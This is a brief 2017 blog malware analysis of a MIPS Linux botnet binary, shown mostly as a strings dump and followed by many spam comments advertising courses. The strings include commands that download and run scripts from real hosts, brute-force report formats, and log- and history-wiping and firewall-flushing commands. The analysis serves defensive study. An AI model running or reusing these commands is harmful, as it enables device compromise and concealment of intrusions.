Saturday, September 9, 2017

Analysis of recent linux malware:

Today we received a linux malware sample for analysis.
MD5: 26413FD652A4ABB3FCA4A936DE6A4736

remnux@remnux:~/Downloads$ file ntpd
ntpd: ELF 32-bit MSB  executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped

This sample appears to be attacking bot. Let's look at the strings:

00000001D6A0   00000001D6A0      0   37.158.%d.%d
00000001D6B0   00000001D6B0      0   95.9.%d.%d
00000001D6BC   00000001D6BC      0   41.252.%d.%d
00000001D6CC   00000001D6CC      0   58.71.%d.%d
00000001D6D8   00000001D6D8      0   104.55.%d.%d
00000001D6E8   00000001D6E8      0   78.186.%d.%d
00000001D6F8   00000001D6F8      0   78.189.%d.%d
00000001D708   00000001D708      0   221.120.%d.%d
00000001D718   00000001D718      0   88.5.%d.%d
00000001D724   00000001D724      0   41.254.%d.%d
00000001D734   00000001D734      0   103.20.%d.%d
00000001D744   00000001D744      0   103.47.%d.%d
00000001D754   00000001D754      0   103.57.%d.%d
00000001D764   00000001D764      0   45.117.%d.%d
00000001D774   00000001D774      0   101.51.%d.%d
00000001D784   00000001D784      0   137.59.%d.%d
00000001D794   00000001D794      0   1.56.%d.%d
00000001D7A0   00000001D7A0      0   1.188.%d.%d
00000001D7AC   00000001D7AC      0   14.204.%d.%d
00000001D7BC   00000001D7BC      0   27.0.%d.%d
00000001D7C8   00000001D7C8      0   27.8.%d.%d
00000001D7D4   00000001D7D4      0   27.50.%d.%d
00000001D7E0   00000001D7E0      0   27.54.%d.%d
00000001D7EC   00000001D7EC      0   27.98.%d.%d
00000001D7F8   00000001D7F8      0   27.112.%d.%d
00000001D808   00000001D808      0   27.192.%d.%d
00000001D818   00000001D818      0   36.32.%d.%d
00000001D824   00000001D824      0   36.248.%d.%d
00000001D834   00000001D834      0   39.64.%d.%d
00000001D840   00000001D840      0   42.4.%d.%d
00000001D84C   00000001D84C      0   42.48.%d.%d
00000001D858   00000001D858      0   42.52.%d.%d
00000001D864   00000001D864      0   42.56.%d.%d
00000001D870   00000001D870      0   42.63.%d.%d
00000001D87C   00000001D87C      0   42.84.%d.%d
00000001D888   00000001D888      0   42.176.%d.%d

Other interesting strings:

00000001E289   00000001E289      0   [0;31mSuccessfully Bruteforced IP: 
00000001E2AD   00000001E2AD      0   [0;33m%s | 
00000001E2B9   00000001E2B9      0   [0;31mUsername: 
00000001E2CA   00000001E2CA      0   [0;33m%s | 
00000001E2D6   00000001E2D6      0   [0;31mPassword: 
00000001E2E7   00000001E2E7      0   [0;33m%s
00000001E2F4   00000001E2F4      0   REPORT %s:%s:%s
00000001E324   00000001E324      0   %s cd /var/; rm -rf tftp; wget http://89.38.96.67/tftp || tftp -r tftp -g 89.38.96.67; chmod 777 tftp; ./tftp; rm -rf tftp
00000001E3A8   00000001E3A8      0   cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.177.172.221/John.sh ; chmod 777 John.sh; sh John.sh; tftp 94.177.172.221 -c get tftp11.sh; chmod 777 tftp11.sh; sh tftp11.sh; tftp -r tftp22.sh -g 94.177.172.221; chmod 777 tftp22.sh; sh tftp22.sh; ftpget -v -u anonymous -p anonymous -P 21 94.177.172.221 ftp11.sh ftp11.sh; sh ftp11.sh; rm -rf John.sh tftp11.sh tftp22.sh ftp11.sh;rm -rf *;history -c
00000001E550   00000001E550      0   jackmy*
00000001E558   00000001E558      0   busybox*
00000001E574   00000001E574      0   tftp*
00000001E584   00000001E584      0   mipsel*
00000001E58C   00000001E58C      0   mips*
00000001E594   00000001E594      0   mips64*
00000001E59C   00000001E59C      0   i686*
00000001E5A4   00000001E5A4      0   sparc*
00000001E5BC   00000001E5BC      0   jackmeoff*
00000001E5C8   00000001E5C8      0   hackz*
00000001E5D0   00000001E5D0      0   bruv*
00000001E5E0   00000001E5E0      0   armv*
00000001E5E8   00000001E5E8      0   ntpd*
00000001E5F0   00000001E5F0      0   shitty*
00000001E5F8   00000001E5F8      0   jack*
00000001E618   00000001E618      0   mipsel
00000001E63C   00000001E63C      0   /dev/netslink/
00000001E64C   00000001E64C      0   /tmp/
00000001E654   00000001E654      0   /var/
00000001E65C   00000001E65C      0   /dev/
00000001E664   00000001E664      0   /var/run/
00000001E670   00000001E670      0   /dev/shm/
00000001E67C   00000001E67C      0   /mnt/
00000001E684   00000001E684      0   /boot/
00000001E68C   00000001E68C      0   /usr/
00000001E694   00000001E694      0   >%s.t && cd %s && for a in 
00000001E6B0   00000001E6B0      0   ls -a %s
00000001E6B9   00000001E6B9      0   ; do >$a; done; >retrieve ;echo ps aux >> proc ; pkill -9 %d
00000001E6F8   00000001E6F8      0   >%s.t && cd %s ; >retrieve
00000001E718   00000001E718      0   pkill -9 %s
00000001E728   00000001E728      0   rm -rf /tmp/* /var/* /var/run/* /var/tmp/*
00000001E754   00000001E754      0   rm -rf /var/log/wtmp
00000001E76C   00000001E76C      0   history -c;history -w
00000001E784   00000001E784      0   rm -rf /tmp/*
00000001E794   00000001E794      0   history -c
00000001E7A0   00000001E7A0      0   rm -rf ~/.bash_history
00000001E7B8   00000001E7B8      0   rm -rf /bin/netstat
00000001E7CC   00000001E7CC      0   history -w
00000001E7D8   00000001E7D8      0   pkill -9 busybox
00000001E7EC   00000001E7EC      0   pkill -9 perl
00000001E7FC   00000001E7FC      0   service iptables stop
00000001E814   00000001E814      0   /sbin/iptables -F;/sbin/iptables -X
00000001E838   00000001E838      0   close
00000001E840   00000001E840      0   keep-alive
00000001E84C   00000001E84C      0   accept
00000001E854   00000001E854      0   Mozilla/5.0 (compatible; Konqueror/3.0; i686 Linux; 20021117)
00000001E894   00000001E894      0   Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5
00000001E8D4   00000001E8D4      0   Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10
00000001E964   00000001E964      0   Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0
00000001E99C   00000001E99C      0   Opera/6.04 (Windows XP; U) [en]
00000001E9BC   00000001E9BC      0   Opera/9.99 (X11; U; sk)
00000001E9D4   00000001E9D4      0   Mozilla/6.0 (Future Star Technologies Corp. Star-Blade OS; U; en-US) iNet Browser 2.5
00000001EA2C   00000001EA2C      0   Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc
00000001EACC   00000001EACC      0   Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk
00000001EB20   00000001EB20      0   Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41
00000001EB94   00000001EB94      0   Mozilla/5.0 (compatible; iCab 3.0.3; Macintosh; U; PPC Mac OS)
00000001EBD4   00000001EBD4      0   Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
00000001EC8C   00000001EC8C      0   Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1
00000001ECE0   00000001ECE0      0   Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)
00000001ED38   00000001ED38      0   Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4
00000001ED90   00000001ED90      0   Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201
00000001EDD0   00000001EDD0      0   Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911
00000001EE18   00000001EE18      0   Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2
00000001EE70   00000001EE70      0   Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)
00000001EEDC   00000001EEDC      0   Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285
00000001EF34   00000001EF34      0   Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7
00000001EF84   00000001EF84      0   Mozilla/5.0 (PLAYSTATION 3; 3.55)
00000001EFA8   00000001EFA8      0   Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2
00000001F004   00000001F004      0   wii libnup/1.0
00000001F014   00000001F014      0   Mozilla/4.0 (PSP (PlayStation Portable); 2.00)
00000001F044   00000001F044      0   PSP (PlayStation Portable); 2.00
00000001F068   00000001F068      0   Bunjalloo/0.7.6(Nintendo DS;U;en)
00000001F08C   00000001F08C      0   Doris/1.15 [en] (Symbian)
00000001F0A8   00000001F0A8      0   BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1
00000001F0E8   00000001F0E8      0   BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100findlinks/2.0.1 (+http://wortschatz.uni-leipzig.de/findlinks/)
00000001F174   00000001F174      0   findlinks/1.1.6-beta6 (+http://wortschatz.uni-leipzig.de/findlinks/)
00000001F1BC   00000001F1BC      0   findlinks/1.1.6-beta4 (+http://wortschatz.uni-leipzig.de/findlinks/)
00000001F204   00000001F204      0   findlinks/1.1.6-beta1 (+http://wortschatz.uni-leipzig.de/findlinks/)
00000001F24C   00000001F24C      0   findlinks/1.1.5-beta7 (+http://wortschatz.uni-leipzig.de/findlinks/)
00000001F294   00000001F294      0   Mozilla/5.0 (Windows; U; WinNT; en; rv:1.0.2) Gecko/20030311 Beonex/0.8.2-stable
00000001F2E8   00000001F2E8      0   Mozilla/5.0 (Windows; U; WinNT; en; Preview) Gecko/20020603 Beonex/0.8-stable
00000001F338   00000001F338      0   Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2 (Debian-1.99+2.0b2+dfsg-1)
00000001F3A4   00000001F3A4      0   Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2
00000001F3F8   00000001F3F8      0   Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b2) Gecko/20060826 BonEcho/2.0b2
00000001F454   00000001F454      0   Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1b2) Gecko/20060831 BonEcho/2.0b2
00000001F4B0   00000001F4B0      0   Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.8.1b1) Gecko/20060601 BonEcho/2.0b1 (Ubuntu-edgy)
00000001F514   00000001F514      0   Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a3) Gecko/20060526 BonEcho/2.0a3
00000001F570   00000001F570      0   Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2
00000001F5CC   00000001F5CC      0   Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2
00000001F628   00000001F628      0   Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2
00000001F688   00000001F688      0   AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)
00000001F6D0   00000001F6D0      0   AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy)
00000001F768   00000001F768      0   AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs)
00000001F7B4   00000001F7B4      0   AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k)
00000001F800   00000001F800      0   AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan)
00000001F850   00000001F850      0   AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr)
00000001F898   00000001F898      0   AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication)
00000001F8EC   00000001F8EC      0   AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout)
00000001F93C   00000001F93C      0   AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23)
00000001F984   00000001F984      0   AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver)
00000001F9D0   00000001F9D0      0   AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k)
00000001FA1C   00000001FA1C      0   magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)
00000001FA64   00000001FA64      0   Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)
00000001FAB4   00000001FAB4      0   Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)
00000001FB04   00000001FB04      0   MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)
00000001FB38   00000001FB38      0   MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+)
00000001FB6C   00000001FB6C      0   Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)
00000001FBB4   00000001FBB4      0   %s %s HTTP/1.1
00000001FBC4   00000001FBC4      0   Connection: %s
00000001FBD4   00000001FBD4      0   Accept: */*
00000001FBE1   00000001FBE1      0   User-Agent: %s
00000001FBF4   00000001FBF4      0   arfgG
00000001FBFC   00000001FBFC      0   HBiug655
00000001FC08   00000001FC08      0   KJYDFyljf754
00000001FC18   00000001FC18      0   LIKUGilkut769458905
00000001FC2C   00000001FC2C      0   JHFDSkgfc5747694
00000001FC40   00000001FC40      0   GJjyur67458
00000001FC4C   00000001FC4C      0   RYSDk747586
00000001FC58   00000001FC58      0   HKJGi5r8675
00000001FC64   00000001FC64      0   KHGK7985i
00000001FC70   00000001FC70      0   yuituiILYF
00000001FC7C   00000001FC7C      0   GKJDghfcjkgd4
00000001FC8C   00000001FC8C      0   uygtfgtrevf
00000001FC98   00000001FC98      0   tyeuhygbtfvg
00000001FCA8   00000001FCA8      0   ewqdcftr
00000001FCB4   00000001FCB4      0   trbazetghhnbrty
00000001FCC4   00000001FCC4      0   tbhrwsehbg
00000001FCD0   00000001FCD0      0   twehgbferhb
00000001FCDC   00000001FCDC      0   etrbhhgetrb
00000001FCE8   00000001FCE8      0   edfverthbyrtb
00000001FCF8   00000001FCF8      0   kmiujmnhnhfgn
00000001FD08   00000001FD08      0   zcdbvgdfsbgfd

Post made by

26 comments:

Anonymous said...

Terrific post but I was wanting to know if you could write a litte more on this
subject? I'd be very grateful if you could elaborate a little bit more.
Bless you!

newworld said...

Thanks for your comment.
Sure, we started concentrating on linux malware files nowadays.
Please watch this space and share this link with others.

by
newWorld

Kale Co Jakim said...

Hi, Great.. Tutorial is just awesome..It is really helpful for a newbie like me.. I am a regular follower of your blog. Really very informative post you shared here. Kindly keep blogging. If anyone wants to become a .Net developer learn from .Net Core Training in Chennai. or learn thru .Net Core Training in Chennai. Nowadays Dot Net has tons of job opportunities on various vertical industry.
or Es6 Training in Chennai. Nowadays JavaScript has tons of job opportunities on various vertical industry.

Unknown said...

Thanks a lot very much for the high quality and results-oriented help. I won’t think twice to endorse your blog post to anybody who wants and needs support about this area.
java training in bangalore
java training in bangalore

jeeva said...

Thanks for the informative article. This is one of the best resources I have found in quite some time. Nicely written and great info. I really cannot thank you enough for sharing
microsoft azure training in bangalore
rpa training in bangalore
best rpa training in bangalore
rpa online training

Jaweed Khan said...

Thanks For Sharing the Information The Information Shared Is very valuable Please Keep Updating us Time Just Went On Reading The article Python Online training Hadoop Online training Data Science Online training AWS Online training

Prwatech said...

I Got Job in my dream company with decent 12 Lacks Per Annum salary, I have learned this world most demanding course out there in the current IT Market from the data science course in puneProviders who helped me a lot to achieve my dreams comes true. Really worth trying instant approval blog commenting sites

Training for IT and Software Courses said...

Wow it is really wonderful and awesome thus it is veWow, it is really wonderful and awesome thus it is very much useful for me to understand many concepts and helped me a lot.

oracle dba training in bangalore

oracle dba courses in bangalore

oracle dba classes in bangalore

oracle dba training institute in bangalore

oracle dba course syllabus

best oracle dba training

oracle dba training centers

Training for IT and Software Courses said...

This is the exact information I am been searching for, Thanks for sharing the required infos with the clear update and required points. To appreciate this I like to share some useful information.

perl training institutes in bangalore

perl training in bangalore

best perl training institutes in bangalore

perl training course content

perl training interview questions

perl training & placement in bangalore

perl training center in bangalore

Training for IT and Software Courses said...

It is very good and useful for students and developer.Learned a lot of new things from your post Good creation,thanks for give a good information at sap crm.

mysql dba training in bangalore

mysql dba courses in bangalore

mysql dba classes in bangalore

mysql dba training institute in bangalore

mysql dba course syllabus

best mysql dba training

mysql dba training centers

Training for IT and Software Courses said...

I have to voice my passion for your kindness giving support to those people that should have guidance on this important matter.

pega training institutes in bangalore

pega training in bangalore

best pega training institutes in bangalore

pega training course content

pega training interview questions

pega training & placement in bangalore

pega training center in bangalore

Training for IT and Software Courses said...

Excellent post for the people who really need information for this technology.

sql server dba training in bangalore

sql server dba courses in bangalore

sql server dba classes in bangalore

sql server dba training institute in bangalore

sql server dba course syllabus

best sql server dba training

sql server dba course syllabus

best sql server dba training

sql server dba training centers

svrtechnologies said...

Thanks for Posting such an useful info...

aws tutorial

Padminiprwatech said...

Thanks for sharing your innovative ideas to our vision. I have read your blog and I gathered some new information through your blog. Your blog is really very informative and unique. Keep posting like this. Awaiting for your further update.If you are looking for any Hadoop related information, please visit our website Hadoop training institute in bangalore

svrtechnologies said...

Thanks for sharing such a great information..Its really nice and informative..

learn data science

Jayalakshmi said...

I can only express a word of thanks! Nothing else. Because your topic is nice, you can add knowledge. Thank you very much for sharing this information.
web designing training in chennai

web designing training in tambaram

digital marketing training in chennai

digital marketing training in tambaram

rpa training in chennai

rpa training in tambaram

tally training in chennai

tally training in tambaram

deiva said...

Wow it is really wonderful and awesome thus it is veWow, it is really wonderful and awesome thus it is very much useful for me to understand many concepts and helped me a lot...
java training in chennai

java training in omr

aws training in chennai

aws training in omr

python training in chennai

python training in omr

selenium training in chennai

selenium training in omr

praveen said...

Really nice post and good job,
Thanks to share with us,

java training in chennai

java training in porur

aws training in chennai

aws training in porur

python training in chennai

python training in porur

selenium training in chennai

selenium training in porur

shiny said...

Thank you for this great article....
data science training in chennai

data science training in annanagar

android training in chennai

android training in annanagar

devops training in chennai

devops training in annanagar

artificial intelligence training in chennai

artificial intelligence training in annanagar

jeni said...

Excellent Blog! I would like to thank for the efforts you have made in writing this post. I am hoping the same best work from you in the future as well. I wanted to thank you for this websites!
angular js training in chennai

angular js training in velachery

full stack training in chennai

full stack training in velachery

php training in chennai

php training in velachery

photoshop training in chennai

photoshop training in velachery

meritstep Technology said...

Thanks for Sharing This Article.It is very so much valuable content. I hope these Commenting lists will help to my website
workday studio online training
best workday studio online training
top workday studio online training


vivekvedha said...

It is very good and useful for students and developer.Learned a lot of new things from your post .
acte chennai

acte complaints

acte reviews

acte trainer complaints

acte trainer reviews

acte velachery reviews complaints

acte tambaram reviews complaints

acte anna nagar reviews complaints

acte porur reviews complaints

acte omr reviews complaints

Vinay kumar said...

This was nice and amazing and the given contents were very useful and the precision has given here is good.

Apache Spark Training in Pune
Spark Training Institute in Pune

Technogeekscs said...

I am really happy with your blog because your article is very unique and powerful for new.
Data Science
Selenium
ETL Testing
AWS
Python Online Classes

seoprofessional said...

Nice blog. Go for salesforce online course

Peter Johnson said...
This comment has been removed by a blog administrator.

Four New Assassin's Creed Game

  Assassin's creed Mirage protagonist Basim AKA LOKI Game happening in Baghdad 20 years before Assassin's creed Valhalla basically g...